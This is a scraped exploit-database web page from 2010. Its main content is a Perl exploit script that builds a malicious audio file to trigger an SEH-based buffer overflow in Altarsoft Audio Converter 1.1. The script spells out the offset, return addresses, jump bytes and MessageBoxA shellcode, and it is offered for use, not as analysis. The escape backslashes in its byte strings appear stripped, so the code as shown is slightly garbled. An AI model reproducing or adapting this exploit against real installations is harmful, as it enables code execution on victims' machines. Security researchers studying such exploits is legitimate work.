[webapps / 0day] - Altarsoft Audio Converter 1.1 Buffer Over
Posted on 16 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH) by ben hawkes in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=========================================================== Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH) =========================================================== # # # Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH) # Date: 16/12/2010 # Author: C4SS!0 G0M3S # Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe # Version: 111 # Tested on: WIN-XP SP3 PT-BR # CVE: N/A # # #Created By C4SS!0 G0M3S #E-MAIL Louredo_@hotmail.com #Home: http://www.invasao.com.br # # use IO::File; if($#ARGV != 0) { sub usage { system("cls"); system("color 4f"); print " ||=================================================================|| "; print " || || "; print " || Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH) || "; print " || Created BY C4SS!0 G0M3S || "; print " || Contact Louredo_@hotmail.com || "; print " || || "; print " ||=================================================================|| "; print("[+]Exploit: Buffer Overflow Altarsoft Audio Converter 1.1(SEH) "); print("[+]Date: 16/12/2010 "); print("[+]Author: C4SS!0 G0M3S "); print("[+]E-mail: Louredo_@hotmail.com "); print("[+]Home: http://www.invasao.com.br "); print("[+]Version: 2.1 "); print("[+]Impact: Hich "); print("[+]Tested On: WIN-XP SP3 Virtual Box "); } usage; print "[-]Usage: $0 <File Name> "; print "[-]Exemple: $0 music.wav "; exit(0); } $file = $ARGV[0]; $buffer = "x41" x 4128; $eip = pack('V',0x004FCA3F); $nseh = "xebx06x90x90"; $seh = pack('V',0x0042f486); $nops = "x90" x 15; #Shellcode MessageBoxA() my $shellcode = "x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50". "xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50". "xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43". "x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B". "x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6"; $payload = $buffer.$eip.$nseh.$seh.$nops.$shellcode; open(f,">$file")or die "ERROR: $! "; print f $payload; close(f); usage; print "[*]Identifying the size Shellcode "; print "[*]The Shellcode Size:".length($shellcode)." "; print "[*]Creating File $file "; print "[*]The File $file Created Successfully "; # <a href='http://1337db.com/'>1337db.com</a> [2010-12-16]</pre></body></html>
